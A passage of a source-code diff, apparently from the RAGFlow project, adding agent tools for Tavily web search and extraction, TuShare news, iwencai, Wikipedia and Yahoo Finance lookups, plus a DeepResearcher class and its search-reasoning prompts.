                        "description": "Domain name that must be included, e.g. www.yahoo.com"
                    },
                    "required": False
                },
                "exclude_domains": {
                    "type": "array",
                    "description": "default:[]. A list of domains from which the search results can not be included",
                    "default": [],
                    "items": {
                        "type": "string",
                        "description": "Domain name that must be excluded, e.g. www.yahoo.com"
                    },
                    "required": False
                },
            }
        }
        super().__init__()
        self.api_key = ""
        self.search_depth = "basic" # basic/advanced
        self.max_results = 6
        self.days = 14
        self.include_answer = False
        self.include_raw_content = False
        self.include_images = False
        self.include_image_descriptions = False
    def check(self):
        self.check_valid_value(self.topic, "Tavily topic: should be in 'general/news'", ["general", "news"])
        self.check_valid_value(self.search_depth, "Tavily search depth should be in 'basic/advanced'", ["basic", "advanced"])
        self.check_positive_integer(self.max_results, "Tavily max result number should be within [1， 20]")
        self.check_positive_integer(self.days, "Tavily days should be greater than 1")
    def get_input_form(self) -> dict[str, dict]:
        return {
            "query": {
                "name": "Query",
                "type": "line"
            }
        }
 class TavilySearch(ToolBase, ABC):
    component_name = "TavilySearch"
    @timeout(os.environ.get("COMPONENT_EXEC_TIMEOUT", 12))
    def _invoke(self, **kwargs):
        if not kwargs.get("query"):
            self.set_output("formalized_content", "")
            return ""
        self.tavily_client = TavilyClient(api_key=self._param.api_key)
        last_e = None
        for fld in ["search_depth", "topic", "max_results", "days", "include_answer", "include_raw_content", "include_images", "include_image_descriptions", "include_domains", "exclude_domains"]:
            if fld not in kwargs:
                kwargs[fld] = getattr(self._param, fld)
        for _ in range(self._param.max_retries+1):
            try:
                kwargs["include_images"] = False
                kwargs["include_raw_content"] = False
                res = self.tavily_client.search(**kwargs)
                self._retrieve_chunks(res["results"],
                                      get_title=lambda r: r["title"],
                                      get_url=lambda r: r["url"],
                                      get_content=lambda r: r["raw_content"] if r["raw_content"] else r["content"],
                                      get_score=lambda r: r["score"])
                self.set_output("json", res["results"])
                return self.output("formalized_content")
            except Exception as e:
                last_e = e
                logging.exception(f"Tavily error: {e}")
                time.sleep(self._param.delay_after_error)
        if last_e:
            self.set_output("_ERROR", str(last_e))
            return f"Tavily error: {last_e}"
        assert False, self.output()
    def thoughts(self) -> str:
        return """
 Keywords: {} 
 Looking for the most relevant articles.
                """.format(self.get_input().get("query", "-_-!"))
 class TavilyExtractParam(ToolParamBase):
    """
    Define the Retrieval component parameters.
    """
    def __init__(self):
        self.meta:ToolMeta = {
            "name": "tavily_extract",
            "description": "Extract web page content from one or more specified URLs using Tavily Extract.",
            "parameters": {
                "urls": {
                    "type": "array",
                    "description": "The URLs to extract content from.",
                    "default": "",
                    "items": {
                        "type": "string",
                        "description": "The URL to extract content from, e.g. www.yahoo.com"
                    },
                    "required": True
                },
                "extract_depth": {
                    "type": "string",
                    "description": "The depth of the extraction process. advanced extraction retrieves more data, including tables and embedded content, with higher success but may increase latency.basic extraction costs 1 credit per 5 successful URL extractions, while advanced extraction costs 2 credits per 5 successful URL extractions.",
                    "enum": ["basic", "advanced"],
                    "default": "basic",
                    "required": False,
                },
                "format": {
                    "type": "string",
                    "description": "The format of the extracted web page content. markdown returns content in markdown format. text returns plain text and may increase latency.",
                    "enum": ["markdown", "text"],
                    "default": "markdown",
                    "required": False,
                }
            }
        }
        super().__init__()
        self.api_key = ""
        self.extract_depth = "basic" # basic/advanced
        self.urls = []
        self.format = "markdown"
        self.include_images = False
    def check(self):
        self.check_valid_value(self.extract_depth, "Tavily extract depth should be in 'basic/advanced'", ["basic", "advanced"])
        self.check_valid_value(self.format, "Tavily extract format should be in 'markdown/text'", ["markdown", "text"])
    def get_input_form(self) -> dict[str, dict]:
        return {
            "urls": {
                "name": "URLs",
                "type": "line"
            }
        }
 class TavilyExtract(ToolBase, ABC):
    component_name = "TavilyExtract"
    @timeout(os.environ.get("COMPONENT_EXEC_TIMEOUT", 10*60))
    def _invoke(self, **kwargs):
        self.tavily_client = TavilyClient(api_key=self._param.api_key)
        last_e = None
        for fld in ["urls", "extract_depth", "format"]:
            if fld not in kwargs:
                kwargs[fld] = getattr(self._param, fld)
        if kwargs.get("urls") and isinstance(kwargs["urls"], str):
            kwargs["urls"] = kwargs["urls"].split(",")
        for _ in range(self._param.max_retries+1):
            try:
                kwargs["include_images"] = False
                res = self.tavily_client.extract(**kwargs)
                self.set_output("json", res["results"])
                return self.output("json")
            except Exception as e:
                last_e = e
                logging.exception(f"Tavily error: {e}")
        if last_e:
            self.set_output("_ERROR", str(last_e))
            return f"Tavily error: {last_e}"
        assert False, self.output()
    def thoughts(self) -> str:
        return "Opened {}—pulling out the main text…".format(self.get_input().get("urls", "-_-!"))
--- a/agent/tools/tushare.py
+++ b/agent/tools/tushare.py
@ -0,0 +1,72 @@
 #
 #  Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
 #
 #  Licensed under the Apache License, Version 2.0 (the "License");
 #  you may not use this file except in compliance with the License.
 #  You may obtain a copy of the License at
 #
 #      http://www.apache.org/licenses/LICENSE-2.0
 #
 #  Unless required by applicable law or agreed to in writing, software
 #  distributed under the License is distributed on an "AS IS" BASIS,
 #  WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 #  See the License for the specific language governing permissions and
 #  limitations under the License.
 #
 import json
 from abc import ABC
 import pandas as pd
 import time
 import requests
 from agent.component.base import ComponentBase, ComponentParamBase
 class TuShareParam(ComponentParamBase):
    """
    Define the TuShare component parameters.
    """
    def __init__(self):
        super().__init__()
        self.token = "xxx"
        self.src = "eastmoney"
        self.start_date = "2024-01-01 09:00:00"
        self.end_date = time.strftime("%Y-%m-%d %H:%M:%S", time.localtime())
        self.keyword = ""
    def check(self):
        self.check_valid_value(self.src, "Quick News Source",
                               ["sina", "wallstreetcn", "10jqka", "eastmoney", "yuncaijing", "fenghuang", "jinrongjie"])
 class TuShare(ComponentBase, ABC):
    component_name = "TuShare"
    def _run(self, history, **kwargs):
        ans = self.get_input()
        ans = ",".join(ans["content"]) if "content" in ans else ""
        if not ans:
            return TuShare.be_output("")
        try:
            tus_res = []
            params = {
                "api_name": "news",
                "token": self._param.token,
                "params": {"src": self._param.src, "start_date": self._param.start_date,
                           "end_date": self._param.end_date}
            }
            response = requests.post(url="http://api.tushare.pro", data=json.dumps(params).encode('utf-8'))
            response = response.json()
            if response['code'] != 0:
                return TuShare.be_output(response['msg'])
            df = pd.DataFrame(response['data']['items'])
            df.columns = response['data']['fields']
            tus_res.append({"content": (df[df['content'].str.contains(self._param.keyword, case=False)]).to_markdown()})
        except Exception as e:
            return TuShare.be_output("**ERROR**: " + str(e))
        if not tus_res:
            return TuShare.be_output("")
        return pd.DataFrame(tus_res)
--- a/agent/tools/wencai.py
+++ b/agent/tools/wencai.py
@ -0,0 +1,114 @@
 #
 #  Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
 #
 #  Licensed under the Apache License, Version 2.0 (the "License");
 #  you may not use this file except in compliance with the License.
 #  You may obtain a copy of the License at
 #
 #      http://www.apache.org/licenses/LICENSE-2.0
 #
 #  Unless required by applicable law or agreed to in writing, software
 #  distributed under the License is distributed on an "AS IS" BASIS,
 #  WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 #  See the License for the specific language governing permissions and
 #  limitations under the License.
 #
 import logging
 import os
 import time
 from abc import ABC
 import pandas as pd
 import pywencai
 from agent.tools.base import ToolParamBase, ToolMeta, ToolBase
 from api.utils.api_utils import timeout
 class WenCaiParam(ToolParamBase):
    """
    Define the WenCai component parameters.
    """
    def __init__(self):
        self.meta:ToolMeta = {
            "name": "iwencai",
            "description": """
 iwencai search: search platform is committed to providing hundreds of millions of investors with the most timely, accurate and comprehensive information, covering news, announcements, research reports, blogs, forums, Weibo, characters, etc.
 robo-advisor intelligent stock selection platform: through AI technology, is committed to providing investors with intelligent stock selection, quantitative investment, main force tracking, value investment, technical analysis and other types of stock selection technologies.
 fund selection platform: through AI technology, is committed to providing excellent fund, value investment, quantitative analysis and other fund selection technologies for foundation citizens.
 """,
            "parameters": {
                "query": {
                    "type": "string",
                    "description": "The question/conditions to select stocks.",
                    "default": "{sys.query}",
                    "required": True
                }
            }
        }
        super().__init__()
        self.top_n = 10
        self.query_type = "stock"
    def check(self):
        self.check_positive_integer(self.top_n, "Top N")
        self.check_valid_value(self.query_type, "Query type",
                               ['stock', 'zhishu', 'fund', 'hkstock', 'usstock', 'threeboard', 'conbond', 'insurance',
                                'futures', 'lccp',
                                'foreign_exchange'])
    def get_input_form(self) -> dict[str, dict]:
        return {
            "query": {
                "name": "Query",
                "type": "line"
            }
        }
 class WenCai(ToolBase, ABC):
    component_name = "WenCai"
    @timeout(os.environ.get("COMPONENT_EXEC_TIMEOUT", 12))
    def _invoke(self, **kwargs):
        if not kwargs.get("query"):
            self.set_output("report", "")
            return ""
        last_e = ""
        for _ in range(self._param.max_retries+1):
            try:
                wencai_res = []
                res = pywencai.get(query=kwargs["query"], query_type=self._param.query_type, perpage=self._param.top_n)
                if isinstance(res, pd.DataFrame):
                    wencai_res.append(res.to_markdown())
                elif isinstance(res, dict):
                    for item in res.items():
                        if isinstance(item[1], list):
                            wencai_res.append(item[0] + "\n" + pd.DataFrame(item[1]).to_markdown())
                        elif isinstance(item[1], str):
                            wencai_res.append(item[0] + "\n" + item[1])
                        elif isinstance(item[1], dict):
                            if "meta" in item[1].keys():
                                continue
                            wencai_res.append(pd.DataFrame.from_dict(item[1], orient='index').to_markdown())
                        elif isinstance(item[1], pd.DataFrame):
                            if "image_url" in item[1].columns:
                                continue
                            wencai_res.append(item[1].to_markdown())
                        else:
                            wencai_res.append(item[0] + "\n" + str(item[1]))
                self.set_output("report", "\n\n".join(wencai_res))
                return self.output("report")
            except Exception as e:
                last_e = e
                logging.exception(f"WenCai error: {e}")
                time.sleep(self._param.delay_after_error)
        if last_e:
            self.set_output("_ERROR", str(last_e))
            return f"WenCai error: {last_e}"
        assert False, self.output()
    def thoughts(self) -> str:
        return "Pulling live financial data for `{}`.".format(self.get_input().get("query", "-_-!"))
--- a/agent/tools/wikipedia.py
+++ b/agent/tools/wikipedia.py
@ -0,0 +1,104 @@
 #
 #  Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
 #
 #  Licensed under the Apache License, Version 2.0 (the "License");
 #  you may not use this file except in compliance with the License.
 #  You may obtain a copy of the License at
 #
 #      http://www.apache.org/licenses/LICENSE-2.0
 #
 #  Unless required by applicable law or agreed to in writing, software
 #  distributed under the License is distributed on an "AS IS" BASIS,
 #  WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 #  See the License for the specific language governing permissions and
 #  limitations under the License.
 #
 import logging
 import os
 import time
 from abc import ABC
 import wikipedia
 from agent.tools.base import ToolMeta, ToolParamBase, ToolBase
 from api.utils.api_utils import timeout
 class WikipediaParam(ToolParamBase):
    """
    Define the Wikipedia component parameters.
    """
    def __init__(self):
        self.meta:ToolMeta = {
            "name": "wikipedia_search",
            "description": """A wide range of how-to and information pages are made available in wikipedia. Since 2001, it has grown rapidly to become the world's largest reference website. From Wikipedia, the free encyclopedia.""",
            "parameters": {
                "query": {
                    "type": "string",
                    "description": "The search keyword to execute with wikipedia. The keyword MUST be a specific subject that can match the title.",
                    "default": "{sys.query}",
                    "required": True
                }
            }
        }
        super().__init__()
        self.top_n = 10
        self.language = "en"
    def check(self):
        self.check_positive_integer(self.top_n, "Top N")
        self.check_valid_value(self.language, "Wikipedia languages",
                               ['af', 'pl', 'ar', 'ast', 'az', 'bg', 'nan', 'bn', 'be', 'ca', 'cs', 'cy', 'da', 'de',
                                'et', 'el', 'en', 'es', 'eo', 'eu', 'fa', 'fr', 'gl', 'ko', 'hy', 'hi', 'hr', 'id',
                                'it', 'he', 'ka', 'lld', 'la', 'lv', 'lt', 'hu', 'mk', 'arz', 'ms', 'min', 'my', 'nl',
                                'ja', 'nb', 'nn', 'ce', 'uz', 'pt', 'kk', 'ro', 'ru', 'ceb', 'sk', 'sl', 'sr', 'sh',
                                'fi', 'sv', 'ta', 'tt', 'th', 'tg', 'azb', 'tr', 'uk', 'ur', 'vi', 'war', 'zh', 'yue'])
    def get_input_form(self) -> dict[str, dict]:
        return {
            "query": {
                "name": "Query",
                "type": "line"
            }
        }
 class Wikipedia(ToolBase, ABC):
    component_name = "Wikipedia"
    @timeout(os.environ.get("COMPONENT_EXEC_TIMEOUT", 60))
    def _invoke(self, **kwargs):
        if not kwargs.get("query"):
            self.set_output("formalized_content", "")
            return ""
        last_e = ""
        for _ in range(self._param.max_retries+1):
            try:
                wikipedia.set_lang(self._param.language)
                wiki_engine = wikipedia
                pages = []
                for p in wiki_engine.search(kwargs["query"], results=self._param.top_n):
                    try:
                        pages.append(wikipedia.page(p))
                    except Exception:
                        pass
                self._retrieve_chunks(pages,
                                      get_title=lambda r: r.title,
                                      get_url=lambda r: r.url,
                                      get_content=lambda r: r.summary)
                return self.output("formalized_content")
            except Exception as e:
                last_e = e
                logging.exception(f"Wikipedia error: {e}")
                time.sleep(self._param.delay_after_error)
        if last_e:
            self.set_output("_ERROR", str(last_e))
            return f"Wikipedia error: {last_e}"
        assert False, self.output()
    def thoughts(self) -> str:
        return """
 Keywords: {} 
 Looking for the most relevant articles.
        """.format(self.get_input().get("query", "-_-!"))
--- a/agent/tools/yahoofinance.py
+++ b/agent/tools/yahoofinance.py
@ -0,0 +1,114 @@
 #
 #  Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
 #
 #  Licensed under the Apache License, Version 2.0 (the "License");
 #  you may not use this file except in compliance with the License.
 #  You may obtain a copy of the License at
 #
 #      http://www.apache.org/licenses/LICENSE-2.0
 #
 #  Unless required by applicable law or agreed to in writing, software
 #  distributed under the License is distributed on an "AS IS" BASIS,
 #  WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 #  See the License for the specific language governing permissions and
 #  limitations under the License.
 #
 import logging
 import os
 import time
 from abc import ABC
 import pandas as pd
 import yfinance as yf
 from agent.tools.base import ToolMeta, ToolParamBase, ToolBase
 from api.utils.api_utils import timeout
 class YahooFinanceParam(ToolParamBase):
    """
    Define the YahooFinance component parameters.
    """
    def __init__(self):
        self.meta:ToolMeta = {
            "name": "yahoo_finance",
            "description": "The Yahoo Finance is a service that provides access to real-time and historical stock market data. It enables users to fetch various types of stock information, such as price quotes, historical prices, company profiles, and financial news. The API offers structured data, allowing developers to integrate market data into their applications and analysis tools.",
            "parameters": {
                "stock_code": {
                    "type": "string",
                    "description": "The stock code or company name.",
                    "default": "{sys.query}",
                    "required": True
                }
            }
        }
        super().__init__()
        self.info = True
        self.history = False
        self.count = False
        self.financials = False
        self.income_stmt = False
        self.balance_sheet = False
        self.cash_flow_statement = False
        self.news = True
    def check(self):
        self.check_boolean(self.info, "get all stock info")
        self.check_boolean(self.history, "get historical market data")
        self.check_boolean(self.count, "show share count")
        self.check_boolean(self.financials, "show financials")
        self.check_boolean(self.income_stmt, "income statement")
        self.check_boolean(self.balance_sheet, "balance sheet")
        self.check_boolean(self.cash_flow_statement, "cash flow statement")
        self.check_boolean(self.news, "show news")
    def get_input_form(self) -> dict[str, dict]:
        return {
            "stock_code": {
                "name": "Stock code/Company name",
                "type": "line"
            }
        }
 class YahooFinance(ToolBase, ABC):
    component_name = "YahooFinance"
    @timeout(os.environ.get("COMPONENT_EXEC_TIMEOUT", 60))
    def _invoke(self, **kwargs):
        if not kwargs.get("stock_code"):
            self.set_output("report", "")
            return ""
        last_e = ""
        for _ in range(self._param.max_retries+1):
            yohoo_res = []
            try:
                msft = yf.Ticker(kwargs["stock_code"])
                if self._param.info:
                    yohoo_res.append("# Information:\n" + pd.Series(msft.info).to_markdown() + "\n")
                if self._param.history:
                    yohoo_res.append("# History:\n" + msft.history().to_markdown() + "\n")
                if self._param.financials:
                    yohoo_res.append("# Calendar:\n" + pd.DataFrame(msft.calendar).to_markdown() + "\n")
                if self._param.balance_sheet:
                    yohoo_res.append("# Balance sheet:\n" + msft.balance_sheet.to_markdown() + "\n")
                    yohoo_res.append("# Quarterly balance sheet:\n" + msft.quarterly_balance_sheet.to_markdown() + "\n")
                if self._param.cash_flow_statement:
                    yohoo_res.append("# Cash flow statement:\n" + msft.cashflow.to_markdown() + "\n")
                    yohoo_res.append("# Quarterly cash flow statement:\n" + msft.quarterly_cashflow.to_markdown() + "\n")
                if self._param.news:
                    yohoo_res.append("# News:\n" + pd.DataFrame(msft.news).to_markdown() + "\n")
                self.set_output("report", "\n\n".join(yohoo_res))
                return self.output("report")
            except Exception as e:
                last_e = e
                logging.exception(f"YahooFinance error: {e}")
                time.sleep(self._param.delay_after_error)
        if last_e:
            self.set_output("_ERROR", str(last_e))
            return f"YahooFinance error: {last_e}"
        assert False, self.output()
    def thoughts(self) -> str:
        return "Pulling live financial data for `{}`.".format(self.get_input().get("stock_code", "-_-!"))
--- a/agentic_reasoning/init.py
+++ b/agentic_reasoning/init.py
@ -0,0 +1 @@
 from .deep_research import DeepResearcher as DeepResearcher
--- a/agentic_reasoning/deep_research.py
+++ b/agentic_reasoning/deep_research.py
@ -0,0 +1,236 @@
 #
 #  Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
 #
 #  Licensed under the Apache License, Version 2.0 (the "License");
 #  you may not use this file except in compliance with the License.
 #  You may obtain a copy of the License at
 #
 #      http://www.apache.org/licenses/LICENSE-2.0
 #
 #  Unless required by applicable law or agreed to in writing, software
 #  distributed under the License is distributed on an "AS IS" BASIS,
 #  WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 #  See the License for the specific language governing permissions and
 #  limitations under the License.
 #
 import logging
 import re
 from functools import partial
 from agentic_reasoning.prompts import BEGIN_SEARCH_QUERY, BEGIN_SEARCH_RESULT, END_SEARCH_RESULT, MAX_SEARCH_LIMIT, \
    END_SEARCH_QUERY, REASON_PROMPT, RELEVANT_EXTRACTION_PROMPT
 from api.db.services.llm_service import LLMBundle
 from rag.nlp import extract_between
 from rag.prompts import kb_prompt
 from rag.utils.tavily_conn import Tavily
 class DeepResearcher:
    def __init__(self,
                 chat_mdl: LLMBundle,
                 prompt_config: dict,
                 kb_retrieve: partial = None,
                 kg_retrieve: partial = None
                 ):
        self.chat_mdl = chat_mdl
        self.prompt_config = prompt_config
        self._kb_retrieve = kb_retrieve
        self._kg_retrieve = kg_retrieve
    def _remove_tags(text: str, start_tag: str, end_tag: str) -> str:
        """General Tag Removal Method"""
        pattern = re.escape(start_tag) + r"(.*?)" + re.escape(end_tag)
        return re.sub(pattern, "", text)
    @staticmethod
    def _remove_query_tags(text: str) -> str:
        """Remove Query Tags"""
        return DeepResearcher._remove_tags(text, BEGIN_SEARCH_QUERY, END_SEARCH_QUERY)
    @staticmethod
    def _remove_result_tags(text: str) -> str:
        """Remove Result Tags"""
        return DeepResearcher._remove_tags(text, BEGIN_SEARCH_RESULT, END_SEARCH_RESULT)
    def _generate_reasoning(self, msg_history):
        """Generate reasoning steps"""
        query_think = ""
        if msg_history[-1]["role"] != "user":
            msg_history.append({"role": "user", "content": "Continues reasoning with the new information.\n"})
        else:
            msg_history[-1]["content"] += "\n\nContinues reasoning with the new information.\n"
        for ans in self.chat_mdl.chat_streamly(REASON_PROMPT, msg_history, {"temperature": 0.7}):
            ans = re.sub(r"^.*</think>", "", ans, flags=re.DOTALL)
            if not ans:
                continue
            query_think = ans
            yield query_think
        return query_think
    def _extract_search_queries(self, query_think, question, step_index):
        """Extract search queries from thinking"""
        queries = extract_between(query_think, BEGIN_SEARCH_QUERY, END_SEARCH_QUERY)
        if not queries and step_index == 0:
            # If this is the first step and no queries are found, use the original question as the query
            queries = [question]
        return queries
    def _truncate_previous_reasoning(self, all_reasoning_steps):
        """Truncate previous reasoning steps to maintain a reasonable length"""
        truncated_prev_reasoning = ""
        for i, step in enumerate(all_reasoning_steps):
            truncated_prev_reasoning += f"Step {i + 1}: {step}\n\n"
        prev_steps = truncated_prev_reasoning.split('\n\n')
        if len(prev_steps) <= 5:
            truncated_prev_reasoning = '\n\n'.join(prev_steps)
        else:
            truncated_prev_reasoning = ''
            for i, step in enumerate(prev_steps):
                if i == 0 or i >= len(prev_steps) - 4 or BEGIN_SEARCH_QUERY in step or BEGIN_SEARCH_RESULT in step:
                    truncated_prev_reasoning += step + '\n\n'
                else:
                    if truncated_prev_reasoning[-len('\n\n...\n\n'):] != '\n\n...\n\n':
                        truncated_prev_reasoning += '...\n\n'
        return truncated_prev_reasoning.strip('\n')
    def _retrieve_information(self, search_query):
        """Retrieve information from different sources"""
        # 1. Knowledge base retrieval
        kbinfos = []
        try:
            kbinfos = self._kb_retrieve(question=search_query) if self._kb_retrieve else {"chunks": [], "doc_aggs": []}
        except Exception as e:
            logging.error(f"Knowledge base retrieval error: {e}")
        # 2. Web retrieval (if Tavily API is configured)
        try:
            if self.prompt_config.get("tavily_api_key"):
                tav = Tavily(self.prompt_config["tavily_api_key"])
                tav_res = tav.retrieve_chunks(search_query)
                kbinfos["chunks"].extend(tav_res["chunks"])
                kbinfos["doc_aggs"].extend(tav_res["doc_aggs"])
        except Exception as e:
            logging.error(f"Web retrieval error: {e}")
        # 3. Knowledge graph retrieval (if configured)
        try:
            if self.prompt_config.get("use_kg") and self._kg_retrieve:
                ck = self._kg_retrieve(question=search_query)
                if ck["content_with_weight"]:
                    kbinfos["chunks"].insert(0, ck)
        except Exception as e:
            logging.error(f"Knowledge graph retrieval error: {e}")
        return kbinfos
    def _update_chunk_info(self, chunk_info, kbinfos):
        """Update chunk information for citations"""
        if not chunk_info["chunks"]:
            # If this is the first retrieval, use the retrieval results directly
            for k in chunk_info.keys():
                chunk_info[k] = kbinfos[k]
        else:
            # Merge newly retrieved information, avoiding duplicates
            cids = [c["chunk_id"] for c in chunk_info["chunks"]]
            for c in kbinfos["chunks"]:
                if c["chunk_id"] not in cids:
                    chunk_info["chunks"].append(c)
            dids = [d["doc_id"] for d in chunk_info["doc_aggs"]]
            for d in kbinfos["doc_aggs"]:
                if d["doc_id"] not in dids:
                    chunk_info["doc_aggs"].append(d)
    def _extract_relevant_info(self, truncated_prev_reasoning, search_query, kbinfos):
        """Extract and summarize relevant information"""
        summary_think = ""
        for ans in self.chat_mdl.chat_streamly(
                RELEVANT_EXTRACTION_PROMPT.format(
                    prev_reasoning=truncated_prev_reasoning,
                    search_query=search_query,
                    document="\n".join(kb_prompt(kbinfos, 4096))
                ),
                [{"role": "user",
                  "content": f'Now you should analyze each web page and find helpful information based on the current search query "{search_query}" and previous reasoning steps.'}],
                {"temperature": 0.7}):
            ans = re.sub(r"^.*</think>", "", ans, flags=re.DOTALL)
            if not ans:
                continue
            summary_think = ans
            yield summary_think
        return summary_think
    def thinking(self, chunk_info: dict, question: str):
        executed_search_queries = []
        msg_history = [{"role": "user", "content": f'Question:\"{question}\"\n'}]
        all_reasoning_steps = []
        think = "<think>"
        for step_index in range(MAX_SEARCH_LIMIT + 1):
            # Check if the maximum search limit has been reached
            if step_index == MAX_SEARCH_LIMIT - 1:
                summary_think = f"\n{BEGIN_SEARCH_RESULT}\nThe maximum search limit is exceeded. You are not allowed to search.\n{END_SEARCH_RESULT}\n"
                yield {"answer": think + summary_think + "</think>", "reference": {}, "audio_binary": None}
                all_reasoning_steps.append(summary_think)
                msg_history.append({"role": "assistant", "content": summary_think})
                break
            # Step 1: Generate reasoning
            query_think = ""
            for ans in self._generate_reasoning(msg_history):
                query_think = ans
                yield {"answer": think + self._remove_query_tags(query_think) + "</think>", "reference": {}, "audio_binary": None}
            think += self._remove_query_tags(query_think)
            all_reasoning_steps.append(query_think)
            # Step 2: Extract search queries
            queries = self._extract_search_queries(query_think, question, step_index)
            if not queries and step_index > 0:
                # If not the first step and no queries, end the search process
                break
            # Process each search query
            for search_query in queries:
                logging.info(f"[THINK]Query: {step_index}. {search_query}")
                msg_history.append({"role": "assistant", "content": search_query})
                think += f"\n\n> {step_index + 1}. {search_query}\n\n"
                yield {"answer": think + "</think>", "reference": {}, "audio_binary": None}
                # Check if the query has already been executed
                if search_query in executed_search_queries:
                    summary_think = f"\n{BEGIN_SEARCH_RESULT}\nYou have searched this query. Please refer to previous results.\n{END_SEARCH_RESULT}\n"
                    yield {"answer": think + summary_think + "</think>", "reference": {}, "audio_binary": None}
                    all_reasoning_steps.append(summary_think)
                    msg_history.append({"role": "user", "content": summary_think})
                    think += summary_think
                    continue
                executed_search_queries.append(search_query)
                # Step 3: Truncate previous reasoning steps
                truncated_prev_reasoning = self._truncate_previous_reasoning(all_reasoning_steps)
                # Step 4: Retrieve information
                kbinfos = self._retrieve_information(search_query)
                # Step 5: Update chunk information
                self._update_chunk_info(chunk_info, kbinfos)
                # Step 6: Extract relevant information
                think += "\n\n"
                summary_think = ""
                for ans in self._extract_relevant_info(truncated_prev_reasoning, search_query, kbinfos):
                    summary_think = ans
                    yield {"answer": think + self._remove_result_tags(summary_think) + "</think>", "reference": {}, "audio_binary": None}
                all_reasoning_steps.append(summary_think)
                msg_history.append(
                    {"role": "user", "content": f"\n\n{BEGIN_SEARCH_RESULT}{summary_think}{END_SEARCH_RESULT}\n\n"})
                think += self._remove_result_tags(summary_think)
                logging.info(f"[THINK]Summary: {step_index}. {summary_think}")
        yield think + "</think>"
--- a/agentic_reasoning/prompts.py
+++ b/agentic_reasoning/prompts.py
@ -0,0 +1,113 @@
 #
 #  Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
 #
 #  Licensed under the Apache License, Version 2.0 (the "License");
 #  you may not use this file except in compliance with the License.
 #  You may obtain a copy of the License at
 #
 #      http://www.apache.org/licenses/LICENSE-2.0
 #
 #  Unless required by applicable law or agreed to in writing, software
 #  distributed under the License is distributed on an "AS IS" BASIS,
 #  WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 #  See the License for the specific language governing permissions and
 #  limitations under the License.
 #
 BEGIN_SEARCH_QUERY = "<|begin_search_query|>"
 END_SEARCH_QUERY = "<|end_search_query|>"
 BEGIN_SEARCH_RESULT = "<|begin_search_result|>"
 END_SEARCH_RESULT = "<|end_search_result|>"
 MAX_SEARCH_LIMIT = 6
 REASON_PROMPT = (
        "You are a reasoning assistant with the ability to perform dataset searches to help "
        "you answer the user's question accurately. You have special tools:\n\n"
        f"- To perform a search: write {BEGIN_SEARCH_QUERY} your query here {END_SEARCH_QUERY}.\n"
        f"Then, the system will search and analyze relevant content, then provide you with helpful information in the format {BEGIN_SEARCH_RESULT} ...search results... {END_SEARCH_RESULT}.\n\n"
        f"You can repeat the search process multiple times if necessary. The maximum number of search attempts is limited to {MAX_SEARCH_LIMIT}.\n\n"
        "Once you have all the information you need, continue your reasoning.\n\n"
        "-- Example 1 --\n" ########################################
        "Question: \"Are both the directors of Jaws and Casino Royale from the same country?\"\n"
        "Assistant:\n"
        f"    {BEGIN_SEARCH_QUERY}Who is the director of Jaws?{END_SEARCH_QUERY}\n\n"
        "User:\n"
        f"    {BEGIN_SEARCH_RESULT}\nThe director of Jaws is Steven Spielberg...\n{END_SEARCH_RESULT}\n\n"
        "Continues reasoning with the new information.\n"
        "Assistant:\n"
        f"    {BEGIN_SEARCH_QUERY}Where is Steven Spielberg from?{END_SEARCH_QUERY}\n\n"
        "User:\n"
        f"    {BEGIN_SEARCH_RESULT}\nSteven Allan Spielberg is an American filmmaker...\n{END_SEARCH_RESULT}\n\n"
        "Continues reasoning with the new information...\n\n"
        "Assistant:\n"
        f"    {BEGIN_SEARCH_QUERY}Who is the director of Casino Royale?{END_SEARCH_QUERY}\n\n"
        "User:\n"
        f"    {BEGIN_SEARCH_RESULT}\nCasino Royale is a 2006 spy film directed by Martin Campbell...\n{END_SEARCH_RESULT}\n\n"
        "Continues reasoning with the new information...\n\n"
        "Assistant:\n"
        f"    {BEGIN_SEARCH_QUERY}Where is Martin Campbell from?{END_SEARCH_QUERY}\n\n"
        "User:\n"
        f"    {BEGIN_SEARCH_RESULT}\nMartin Campbell (born 24 October 1943) is a New Zealand film and television director...\n{END_SEARCH_RESULT}\n\n"
        "Continues reasoning with the new information...\n\n"
        "Assistant:\nIt's enough to answer the question\n"
        "-- Example 2 --\n" #########################################
        "Question: \"When was the founder of craigslist born?\"\n"
        "Assistant:\n"
        f"    {BEGIN_SEARCH_QUERY}Who was the founder of craigslist?{END_SEARCH_QUERY}\n\n"
        "User:\n"
        f"    {BEGIN_SEARCH_RESULT}\nCraigslist was founded by Craig Newmark...\n{END_SEARCH_RESULT}\n\n"
        "Continues reasoning with the new information.\n"
        "Assistant:\n"
        f"    {BEGIN_SEARCH_QUERY} When was Craig Newmark born?{END_SEARCH_QUERY}\n\n"
        "User:\n"
        f"    {BEGIN_SEARCH_RESULT}\nCraig Newmark was born on December 6, 1952...\n{END_SEARCH_RESULT}\n\n"
        "Continues reasoning with the new information...\n\n"
        "Assistant:\nIt's enough to answer the question\n"
        "**Remember**:\n"
        f"- You have a dataset to search, so you just provide a proper search query.\n"
        f"- Use {BEGIN_SEARCH_QUERY} to request a dataset search and end with {END_SEARCH_QUERY}.\n"
        "- The language of query MUST be as the same as 'Question' or 'search result'.\n"
        "- If no helpful information can be found, rewrite the search query to be less and precise keywords.\n"
        "- When done searching, continue your reasoning.\n\n"
        'Please answer the following question. You should think step by step to solve it.\n\n'
    )
 RELEVANT_EXTRACTION_PROMPT = """**Task Instruction:**
    You are tasked with reading and analyzing web pages based on the following inputs: **Previous Reasoning Steps**, **Current Search Query**, and **Searched Web Pages**. Your objective is to extract relevant and helpful information for **Current Search Query** from the **Searched Web Pages** and seamlessly integrate this information into the **Previous Reasoning Steps** to continue reasoning for the original question.
    **Guidelines:**
    1. **Analyze the Searched Web Pages:**
    - Carefully review the content of each searched web page.
    - Identify factual information that is relevant to the **Current Search Query** and can aid in the reasoning process for the original question.
    2. **Extract Relevant Information:**
